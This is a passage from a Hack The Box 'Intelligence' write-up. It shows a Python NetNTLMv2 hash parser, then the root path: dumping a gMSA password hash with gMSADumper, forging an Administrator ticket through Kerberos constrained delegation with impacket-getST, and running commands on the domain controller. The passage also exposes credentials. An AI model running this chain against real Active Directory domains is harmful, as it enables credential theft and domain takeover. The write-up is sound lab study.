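    return _EPOCH_1601 + timedelta(microseconds=ft // 10)


def datetime_to_filetime(dt):
    return int((dt - _EPOCH_1601) / timedelta(microseconds=1)) * 10


def parse_blob(blob):
    """Decode the NTLMv2_CLIENT_CHALLENGE structure (MS-NLMP 2.2.2.7)."""
    if blob[:2] != b"\x01\x01":
        raise ValueError("not an NTLMv2 client challenge blob")
    timestamp, client_chal = struct.unpack_from("<Q8s", blob, 8)
    info, pos = {}, 28  # AV pairs start after the 4 reserved bytes
    while pos + 4 <= len(blob):
        av_id, av_len = struct.unpack_from("<HH", blob, pos)
        pos += 4
        if av_id == 0:  # MsvAvEOL
            break
        value = blob[pos:pos + av_len]
        pos += av_len
        if av_id in AV_NAMES:
            info[AV_NAMES[av_id]] = value.decode("utf-16-le")
    return {"timestamp": filetime_to_datetime(timestamp),
            "client_challenge": client_chal.hex(), "target_info": info}


def parse_netntlmv2(line):
    """'user::domain:serverchallenge:ntproofstr:blob' -> dict of findings."""
    user, _, domain, server_chal, ntproof, blob_hex = line.split(":")
    parsed = parse_blob(bytes.fromhex(blob_hex))
    return {
        "user": user, "domain": domain,
        "server_challenge": server_chal,
        "responder_static_challenge": server_chal.lower() == RESPONDER_DEFAULT_CHALLENGE,
        "ntproofstr": ntproof,
        **parsed,
    }


def build_sample_line():
    """Construct a line in the captured format (demonstration only)."""
    ts = datetime_to_filetime(datetime(2021, 8, 26, 22, 10, 0, tzinfo=timezone.utc))
    avs = b"".join(struct.pack("<HH", i, len(v)) + v for i, v in (
        (1, "DC".encode("utf-16-le")),
        (2, "INTELLIGENCE".encode("utf-16-le")),
        (3, "dc.intelligence.htb".encode("utf-16-le")),
        (9, "HTTP/web_example.intelligence.htb".encode("utf-16-le")),  # made-up SPN
    )) + struct.pack("<HH", 0, 0)
    blob = (b"\x01\x01" + b"\x00" * 6 + struct.pack("<Q", ts)
            + bytes(range(8)) + b"\x00" * 4 + avs)
    ntproof = "00" * 16  # placeholder; a real value is an HMAC-MD5 output
    return "Ted.Graves::intelligence:%s:%s:%s" % (RESPONDER_DEFAULT_CHALLENGE, ntproof, blob.hex())


if __name__ == "__main__":
    for k, v in parse_netntlmv2(build_sample_line()).items():
        print("%-28s %s" % (k, v))
```

The TargetName pair is the part worth correlating: it records the SPN the client requested, so a name that matches no legitimate host in the zone points straight at the rogue record that was added.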
ROOT FLAG v1
With the password in hand we can now try more Impacket tools, as well as gMSADumper (see https://www.thehacker.recipes/ad/movement/access-controls/readgmsapassword):
starlord@HAL-9000:~/Bureau/Tools/gMSADumper$ python3 gMSADumper.py -u "Ted.Graves" -p "Mr.Teddy" -d intelligence.htb
Users or groups who can read password for svc_int$:
> DC$
> itsupport
svc_int$:::5e47bac787e5e1970cf9acdb5b316239
starlord@HAL-9000:~/Bureau/Tools/gMSADumper$ sudo su
[sudo] Mot de passe de starlord : MzU2MTMzMzIzMzM5MzMzMDM1MzkzMzMyMzYzODM2Mzg=
root@HAL-9000:/home/starlord/Bureau/Tools/gMSADumper# python3 gMSADumper.py -u "Ted.Graves" -p "Mr.Teddy" -d intelligence.htb
Users or groups who can read password for svc_int$:
> DC$
> itsupport
svc_int$:::5e47bac787e5e1970cf9acdb5b316239
Because of the clock skew between my machine and the target box (Kerberos only tolerates a few minutes of difference), I needed to sync my clock with the DC:
starlord@HAL-9000:~/Bureau/Tools/gMSADumper$ sudo net time set -S 10.10.10.248
Now we can use the hash to get a Ticket Granting Ticket (TGT) for svc_int$ and, through S4U2self followed by S4U2proxy, a Ticket Granting Service (TGS) ticket for WWW/dc.intelligence.htb as Administrator, which works because svc_int$ is trusted for constrained delegation to that SPN.
starlord@HAL-9000:~/Bureau/Tools/gMSADumper$ impacket-getST intelligence.htb/svc_int$ -spn WWW/dc.intelligence.htb -hashes :5e47bac787e5e1970cf9acdb5b316239 -impersonate Administrator
Impacket v0.9.23.dev1+20210302.130123.df00d15c - Copyright 2020 SecureAuth Corporation
[*] Getting TGT for user
[*] Impersonating Administrator
[*] Requesting S4U2self
[*] Requesting S4U2Proxy
[*] Saving ticket in Administrator.ccache
starlord@HAL-9000:~/Bureau/Tools/gMSADumper$ export KRB5CCNAME=Administrator.ccache
starlord@HAL-9000:~/Bureau/Tools/gMSADumper$ impacket-atexec -k -no-pass dc.intelligence.htb "type C:\Users\Administrator\Desktop\root.txt"
Impacket v0.9.23.dev1+20210302.130123.df00d15c - Copyright 2020 SecureAuth Corporation
[!] This will work ONLY on Windows >= Vista
[*] Creating task hQJalxZl
[*] Running task hQJalxZl
[*] Deleting task hQJalxZl
[*] Attempting to read ADMIN$\Temp\hQJalxZl.tmp
a8cb37741c3626ba5ebcb06a26140bf4
ROOT FLAG v2
impacket-smbclient -k -no-pass intelligence.htb/Administrator@dc.intelligence.htb
Impacket v0.9.23.dev1+20210302.130123.df00d15c - Copyright 2020 SecureAuth Corporation
Type help for list of commands
# ls
[-] No share selected
# help
open {host,port=445} - opens a SMB connection against the target host/port
login {domain/username,passwd} - logs into the current SMB connection, no parameters for NULL connection. If no password specified, it'll be prompted
kerberos_login {domain/username,passwd} - logs into the current SMB connection using Kerberos. If no password specified, it'll be prompted. Use the DNS resolvable domain name
login_hash {domain/username,lmhash:nthash} - logs into the current SMB connection using the password hashes
logoff - logs off
shares - list available shares
use {sharename} - connect to an specific share
cd {path} - changes the current directory to {path}
lcd {path} - changes the current local directory to {path}
pwd - shows current remote directory
password - changes the user password, the new password will be prompted for input
ls {wildcard} - lists all the files in the current directory
rm {file} - removes the selected file
mkdir {dirname} - creates the directory under the current path
rmdir {dirname} - removes the directory under the current path
put (unknown) - uploads the filename into the current path
get (unknown) - downloads the filename from the current path
mount {target,path} - creates a mount point from {path} to {target} (admin required)
umount {path} - removes the mount point at {path} without deleting the directory (admin required)
list_snapshots {path} - lists the vss snapshots for the specified path
info - returns NetrServerInfo main results
who - returns the sessions currently connected at the target host (admin required)
close - closes the current SMB Session
exit - terminates the server process (and this session)
After reading into the commands list I managed to navigate the smb shares.
# shares
ADMIN$
C$
IPC$
IT
NETLOGON
SYSVOL
Users
# ls
[-] No share selected
# use USERS
# ls
drw-rw-rw- 0 Mon Apr 19 03:20:26 2021 .
drw-rw-rw- 0 Mon Apr 19 03:20:26 2021 ..
drw-rw-rw- 0 Mon Apr 19 02:18:39 2021 Administrator
drw-rw-rw- 0 Mon Apr 19 05:16:30 2021 All Users
drw-rw-rw- 0 Mon Apr 19 04:17:40 2021 Default
drw-rw-rw- 0 Mon Apr 19 05:16:30 2021 Default User
-rw-rw-rw- 174 Mon Apr 19 05:15:17 2021 desktop.ini
drw-rw-rw- 0 Mon Apr 19 02:18:39 2021 Public
drw-rw-rw- 0 Mon Apr 19 03:20:26 2021 Ted.Graves
drw-rw-rw- 0 Mon Apr 19 02:51:46 2021 Tiffany.Molina
#
# cd Administrator
# cd Desktop
# ls
drw-rw-rw- 0 Mon Apr 19 02:51:57 2021 .
drw-rw-rw- 0 Mon Apr 19 02:51:57 2021 ..
-rw-rw-rw- 282 Mon Apr 19 02:40:10 2021 desktop.ini
-rw-rw-rw- 34 Thu Sep 2 14:45:58 2021 root.txt
# root.txt
*** Unknown syntax: root.txt
# type root.txt
*** Unknown syntax: type root.txt
# read root.txt
*** Unknown syntax: read root.txt
# get root.txt
https://www.hackthebox.com/achievement/machine/377831/357
SENTIMENT:
This was a very enjoyable box which made me solve both scripting and DNS problems, as well as abusing group managed service account passwords and Kerberos. I was glad to do a lab which allows one to practice with Impacket tools. The user part was a great chain of eureka moments for me from the moment I realized there was more than one PDF, and the root part was a lot of research and reading which made me learn a lot.
Thanks to the author, who is also the creator of gMSADumper 🙂
Other links I will remember:
https://www.hackingarticles.in/impacket-guide-smb-msrpc/
https://www.hackingarticles.in/abusing-kerberos-using-impacket/
https://nored0x.github.io/red-teaming/Kerberos-golden-Ticket/
https://github.com/SecureAuthCorp/impacket
https://m0chan.github.io/2019/07/31/How-To-Attack-Kerberos-101.html